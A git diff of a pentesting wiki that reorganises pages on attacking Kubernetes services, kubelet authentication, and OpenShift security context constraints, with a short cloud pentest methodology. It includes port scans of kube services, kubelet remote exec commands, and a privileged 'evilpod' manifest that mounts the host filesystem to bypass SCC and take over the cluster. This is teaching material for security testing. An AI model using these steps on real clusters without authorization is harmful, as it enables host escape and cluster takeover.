--- a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
+++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md
@@ -1,19 +1,6 @@
 # Pentesting Kubernetes Services
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**.
 
@@ -25,9 +12,9 @@ One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://c
 
 It might be useful for you to understand how Kubernetes can **expose services publicly** in order to find them:
 
-{% content-ref url="../exposing-services-in-kubernetes.md" %}
-[exposing-services-in-kubernetes.md](../exposing-services-in-kubernetes.md)
-{% endcontent-ref %}
+{{#ref}}
+../exposing-services-in-kubernetes.md
+{{#endref}}
 
 ## Finding Exposed pods via port scanning
 
@@ -52,11 +39,9 @@ The following ports might be open in a Kubernetes cluster:
 
 ### Nmap
 
-{% code overflow="wrap" %}
 ```bash
 nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 /16
 ```
-{% endcode %}
 
 ### Kube-apiserver
 
@@ -72,9 +57,9 @@ curl -k https://:(8|6)443/api/v1
 
 **Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:**
 
-{% content-ref url="../kubernetes-enumeration.md" %}
-[kubernetes-enumeration.md](../kubernetes-enumeration.md)
-{% endcontent-ref %}
+{{#ref}}
+../kubernetes-enumeration.md
+{{#endref}}
 
 ### Kubelet API
 
@@ -167,9 +152,9 @@ The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-lin
 
 To understand better how the **authentication and authorization of the Kubelet API works** check this page:
 
-{% content-ref url="kubelet-authentication-and-authorization.md" %}
-[kubelet-authentication-and-authorization.md](kubelet-authentication-and-authorization.md)
-{% endcontent-ref %}
+{{#ref}}
+kubelet-authentication-and-authorization.md
+{{#endref}}
 
 The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
 
@@ -205,9 +190,8 @@ This endpoint allows to execute code inside any container very easily:
 kubeletctl exec [command]
 ```
 
-{% hint style="info" %}
-To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level.
-{% endhint %}
+> [!NOTE]
+> To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level.
 
 ### **Checking Kubelet (Read Only Port) Information Exposure**
 
@@ -219,21 +203,12 @@ An example of how this vulnerability can be exploited involves a remote attacker
 
 ## References
 
-{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %}
+{{#ref}}
+https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2
+{{#endref}}
 
-{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %}
+{{#ref}}
+https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
similarity index 55%
rename from pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
rename to src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
index 1c74525af..abcfdccd7 100644
--- a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
+++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md
@@ -1,19 +1,6 @@
 # Kubelet Authentication & Authorization
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Kubelet Authentication 
 
@@ -23,7 +10,7 @@ By default, requests to the kubelet's HTTPS endpoint that are not rejected by ot
 
 The **3** authentication **methods** are:
 
-* **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:**
+- **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:**
 
 ```json
 "authentication": {
@@ -32,9 +19,9 @@ The **3** authentication **methods** are:
     },
 ```
 
-* **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with:
-  * ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server
-  * start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting:
+- **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with:
+  - ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server
+  - start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting:
 
 ```json
 "authentication": {
@@ -44,13 +31,12 @@ The **3** authentication **methods** are:
     },
 ```
 
-{% hint style="info" %}
-The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens
-{% endhint %}
+> [!NOTE]
+> The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens
 
-* **X509 client certificates:** Allow to authenticate via X509 client certs
-  * see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details
-  * start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config:
+- **X509 client certificates:** Allow to authenticate via X509 client certs
+  - see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details
+  - start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config:
 
 ```json
 "authentication": {
@@ -66,9 +52,8 @@ Any request that is successfully authenticated (including an anonymous request)
 
 However, the other possible value is **`webhook`** (which is what you will be **mostly finding out there**). This mode will **check the permissions of the authenticated user** to allow or disallow an action.
 
-{% hint style="warning" %}
-Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action.
-{% endhint %}
+> [!WARNING]
+> Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action.
 
 The authorization via webhook can be configured using the **param `--authorization-mode=Webhook`** or via the config file with:
 
@@ -86,7 +71,7 @@ The kubelet calls the **`SubjectAccessReview`** API on the configured API server
 
 The kubelet authorizes API requests using the same [request attributes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes) approach as the apiserver:
 
-* **Action**
+- **Action**
 
 | HTTP verb | request verb                                                                                                                                                  |
 | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -96,7 +81,7 @@ The kubelet authorizes API requests using the same [request attributes](https://
 | PATCH     | patch                                                                                                                                                         |
 | DELETE    | delete (for individual resources), deletecollection (for collections)                                                                                         |
 
-* The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path:
+- The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path:
 
 | Kubelet API  | resource | subresource |
 | ------------ | -------- | ----------- |
@@ -113,25 +98,12 @@ curl -k --header "Authorization: Bearer ${TOKEN}" 'https://172.31.28.172:10250/p
 Forbidden (user=system:node:ip-172-31-28-172.ec2.internal, verb=get, resource=nodes, subresource=proxy)
 ```
 
-* We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message.
-* We can see the **username** (in this case from the token)
-* Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information)
+- We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message.
+- We can see the **username** (in this case from the token)
+- Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information)
 
 ## References
 
-* [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
+- [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/README.md b/src/pentesting-cloud/openshift-pentesting/README.md
new file mode 100644
index 000000000..f06a1552c
--- /dev/null
+++ b/src/pentesting-cloud/openshift-pentesting/README.md
@@ -0,0 +1,19 @@
+# OpenShift Pentesting
+
+## Basic Information
+
+{{#ref}}
+openshift-basic-information.md
+{{#endref}}
+
+## Security Context Constraints
+
+{{#ref}}
+openshift-scc.md
+{{#endref}}
+
+## Privilege Escalation
+
+{{#ref}}
+openshift-privilege-escalation/
+{{#endref}}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-basic-information.md b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
similarity index 66%
rename from pentesting-cloud/openshift-pentesting/openshift-basic-information.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
index 053271501..59647f2e9 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
@@ -14,7 +14,9 @@ OpenShift is Red Hat’s container application platform that offers a superset o
 
 OpenShift come with a it's own CLI, that can be found here:
 
-{% embed url="https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html" %}
+{{#ref}}
+https://docs.openshift.com/container-platform/4.11/cli_reference/openshift_cli/getting-started-cli.html
+{{#endref}}
 
 To login using the CLI:
 
@@ -25,12 +27,14 @@ oc login -s= --token=
 
 ### **OpenShift - Security Context Constraints** 
 
-In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional\_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access.
+In addition to the [RBAC resources](https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#architecture-additional-concepts-authorization) that control what a user can do, OpenShift Container Platform provides _security context constraints_ (SCC) that control the actions that a pod can perform and what it has the ability to access.
 
 SCC is a policy object that has special rules that correspond with the infrastructure itself, unlike RBAC that has rules that correspond with the Platform. It helps us define what Linux access-control features the container should be able to request/run. Example: Linux Capabilities, SECCOMP profiles, Mount localhost dirs, etc.
 
-{% content-ref url="openshift-scc.md" %}
-[openshift-scc.md](openshift-scc.md)
-{% endcontent-ref %}
+{{#ref}}
+openshift-scc.md
+{{#endref}}
 
-{% embed url="https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints" %}
+{{#ref}}
+https://docs.openshift.com/container-platform/3.11/architecture/additional_concepts/authorization.html#security-context-constraints
+{{#endref}}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
similarity index 93%
rename from pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
index d9d87e5e1..eb111ebd7 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
@@ -34,6 +34,6 @@ You can just edit a build script (such as Jenkinsfile), commit and push (eventua
 
 ## Jenkins Build Pod YAML override
 
-{% content-ref url="openshift-jenkins-build-overrides.md" %}
-[openshift-jenkins-build-overrides.md](openshift-jenkins-build-overrides.md)
-{% endcontent-ref %}
+{{#ref}}
+openshift-jenkins-build-overrides.md
+{{#endref}}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
similarity index 100%
rename from pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
new file mode 100644
index 000000000..437a848f6
--- /dev/null
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
@@ -0,0 +1,19 @@
+# OpenShift - Privilege Escalation
+
+## Missing Service Account
+
+{{#ref}}
+openshift-missing-service-account.md
+{{#endref}}
+
+## Tekton
+
+{{#ref}}
+openshift-tekton.md
+{{#endref}}
+
+## SCC Bypass
+
+{{#ref}}
+openshift-scc-bypass.md
+{{#endref}}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
similarity index 78%
rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
index 57dee3436..60fa06b95 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
@@ -4,7 +4,7 @@
 
 It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
 
-

+

 
 In the previous graph we got multiple AbsentProject meaning multiple project that appears in Roles Bindings or SCC but are not yet created in the cluster. In the same vein we also got an AbsentServiceAccount.
 
@@ -12,10 +12,12 @@ If we can create a project and the missing SA in it, the SA will inherited from
 
 The following example show a missing SA which is granted node-exporter SCC:
 
-

+

 
 ## Tools
 
 The following tool can be use to enumerate this issue and more generally to graph an OpenShift cluster:
 
-{% embed url="https://github.com/maxDcb/OpenShiftGrapher" %}
+{{#ref}}
+https://github.com/maxDcb/OpenShiftGrapher
+{{#endref}}
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
similarity index 71%
rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
index e89392fa9..b7fae734b 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
@@ -6,12 +6,12 @@
 
 By default, SCC does not apply on following projects :
 
-* **default**
-* **kube-system**
-* **kube-public**
-* **openshift-node**
-* **openshift-infra**
-* **openshift**
+- **default**
+- **kube-system**
+- **kube-public**
+- **openshift-node**
+- **openshift-infra**
+- **openshift**
 
 If you deploy pods within one of those namespaces, no SCC will be enforced, allowing for the deployment of privileged pods or mounting of the host file system.
 
@@ -19,8 +19,8 @@ If you deploy pods within one of those namespaces, no SCC will be enforced, allo
 
 There is a way to disable the SCC application on your pod according to RedHat documentation. You will need to have at least one of the following permission :
 
-* Create a Namespace and Create a Pod on this Namespace
-* Edit a Namespace and Create a Pod on this Namespace
+- Create a Namespace and Create a Pod on this Namespace
+- Edit a Namespace and Create a Pod on this Namespace
 
 ```bash
 $ oc auth can-i create namespaces
@@ -32,7 +32,7 @@ $ oc auth can-i patch namespaces
 
 The specific label`openshift.io/run-level` enables users to circumvent SCCs for applications. As per RedHat documentation, when this label is utilized, no SCCs are enforced on all pods within that namespace, effectively removing any restrictions.
 
-

+

 
 ## Add Label
 
@@ -67,38 +67,38 @@ kind: Pod
 metadata:
   name: evilpod
   labels:
-    kubernetes.io/hostname: evilpod 
+    kubernetes.io/hostname: evilpod
 spec:
-  hostNetwork: true #Bind pod network to the host network 
+  hostNetwork: true #Bind pod network to the host network
   hostPID: true #See host processes
   hostIPC: true #Access host inter processes
   containers:
-  - name: evil    
-    image: MYIMAGE
-    imagePullPolicy: IfNotPresent
-    securityContext:
-      privileged: true
-      allowPrivilegeEscalation: true  
-    resources:
-      limits:
-        memory: 200Mi
-      requests:
-        cpu: 30m
-        memory: 100Mi
-    volumeMounts:
-    - name: hostrootfs
-      mountPath: /mnt
+    - name: evil
+      image: MYIMAGE
+      imagePullPolicy: IfNotPresent
+      securityContext:
+        privileged: true
+        allowPrivilegeEscalation: true
+      resources:
+        limits:
+          memory: 200Mi
+        requests:
+          cpu: 30m
+          memory: 100Mi
+      volumeMounts:
+        - name: hostrootfs
+          mountPath: /mnt
   volumes:
-  - name: hostrootfs
-    hostPath:
-      path: 
+    - name: hostrootfs
+      hostPath:
+        path:
 ```
 
 Now, it has become easier to escalate privileges to access the host system and subsequently take over the entire cluster, gaining 'cluster-admin' privileges. Look for **Node-Post Exploitation** part in the following page :
 
-{% content-ref url="../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md)
-{% endcontent-ref %}
+{{#ref}}
+../../kubernetes-security/attacking-kubernetes-from-inside-a-pod.md
+{{#endref}}
 
 ### Custom labels
 
@@ -106,11 +106,11 @@ Furthermore, based on the target setup, some custom labels / annotations may be
 
 Try to look for custom labels if you can read some resources. Here a list of interesting resources :
 
-* Pod
-* Deployment
-* Namespace
-* Service
-* Route
+- Pod
+- Deployment
+- Namespace
+- Service
+- Route
 
 ```bash
 $ oc get pod -o yaml | grep labels -A 5
@@ -133,6 +133,6 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, *
 
 ## References
 
-* [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html)
-* [https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html](https://docs.openshift.com/container-platform/3.11/admin\_guide/manage\_scc.html)
-* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
+- [https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html](https://docs.openshift.com/container-platform/4.8/authentication/managing-security-context-constraints.html)
+- [https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html)
+- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper)
diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
similarity index 92%
rename from pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
index aa0c55614..bdb8deb70 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
@@ -10,9 +10,9 @@ With Tekton everything is represented by YAML files. Developers can create Custo
 
 When tekton is installed a service account (sa) called pipeline is created in every namespace. When a Pipeline is ran, a pod will be spawned using this sa called `pipeline` to run the tasks defined in the YAML file.
 
-{% embed url="https://tekton.dev/docs/getting-started/pipelines/" %}
-Tekton Doc about Pipelines
-{% endembed %}
+{{#ref}}
+https://tekton.dev/docs/getting-started/pipelines/
+{{#endref}}
 
 ### The Pipeline service account capabilities
 
@@ -53,9 +53,9 @@ The tekton operator will give to the pipeline service account in `test-namespace
 
 Tekton documents about how to restrict the override of scc by adding a label in the `TektonConfig` object.
 
-{% embed url="https://tekton.dev/docs/operator/sccconfig/" %}
-Tekton doc about scc
-{% endembed %}
+{{#ref}}
+https://tekton.dev/docs/operator/sccconfig/
+{{#endref}}
 
 This label is called `max-allowed` 
 
@@ -73,4 +73,3 @@ spec:
         default: "restricted-v2"
         maxAllowed: "privileged"
 ```
-
diff --git a/pentesting-cloud/openshift-pentesting/openshift-scc.md b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
similarity index 82%
rename from pentesting-cloud/openshift-pentesting/openshift-scc.md
rename to src/pentesting-cloud/openshift-pentesting/openshift-scc.md
index 68dae698d..6728c4ce2 100644
--- a/pentesting-cloud/openshift-pentesting/openshift-scc.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
@@ -19,13 +19,13 @@ By configuring SCCs, administrators can ensure that pods are running with the ap
 
 Basically, every time a pod deployment is requested, an admission process is executed as the following:
 
-

+

 
 This additional security layer by default prohibits the creation of privileged pods, mounting of the host file system, or setting any attributes that could lead to privilege escalation.
 
-{% content-ref url="../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md" %}
-[pod-escape-privileges.md](../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
-{% endcontent-ref %}
+{{#ref}}
+../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md
+{{#endref}}
 
 ## List SCC
 
@@ -59,10 +59,10 @@ $ oc apply -f evilpod.yaml #Deploy a privileged pod
 
 ## SCC Bypass
 
-{% content-ref url="openshift-privilege-escalation/openshift-scc-bypass.md" %}
-[openshift-scc-bypass.md](openshift-privilege-escalation/openshift-scc-bypass.md)
-{% endcontent-ref %}
+{{#ref}}
+openshift-privilege-escalation/openshift-scc-bypass.md
+{{#endref}}
 
 ## References
 
-* [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift)
+- [https://www.redhat.com/en/blog/managing-sccs-in-openshift](https://www.redhat.com/en/blog/managing-sccs-in-openshift)
diff --git a/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md
similarity index 71%
rename from pentesting-cloud/pentesting-cloud-methodology.md
rename to src/pentesting-cloud/pentesting-cloud-methodology.md
index 6e7039d1c..782f630a2 100644
--- a/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -1,48 +1,35 @@
 # Pentesting Cloud Methodology
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../banners/hacktricks-training.md}}
 
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
-
-

+

 
 ## Basic Methodology
 
 Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment:
 
-* **Benchmark checks**
-  * This will help you **understand the size** of the environment and **services used**
-  * It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools**
-* **Services Enumeration**
-  * You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.
-  * This will allow you to know **what is exactly being used** in the cloud env
-  * This will help a lot in the next steps
-* **Check exposed assets**
-  * This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed.
-    * Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets)
-  * Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?)
-* **Check permissions**
-  * Here you should **find out all the permissions of each role/user** inside the cloud and how are they used
-    * Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already
-    * If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100)
-  * It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**.
-    * Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported.
-* **Check Integrations**
-  * It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env.
-    * For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\
+- **Benchmark checks**
+  - This will help you **understand the size** of the environment and **services used**
+  - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools**
+- **Services Enumeration**
+  - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.
+  - This will allow you to know **what is exactly being used** in the cloud env
+  - This will help a lot in the next steps
+- **Check exposed assets**
+  - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed.
+    - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets)
+  - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?)
+- **Check permissions**
+  - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used
+    - Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already
+    - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100)
+  - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**.
+    - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported.
+- **Check Integrations**
+  - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env.
+    - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\
       For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data).
-    * For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\
+    - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\
       For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud.
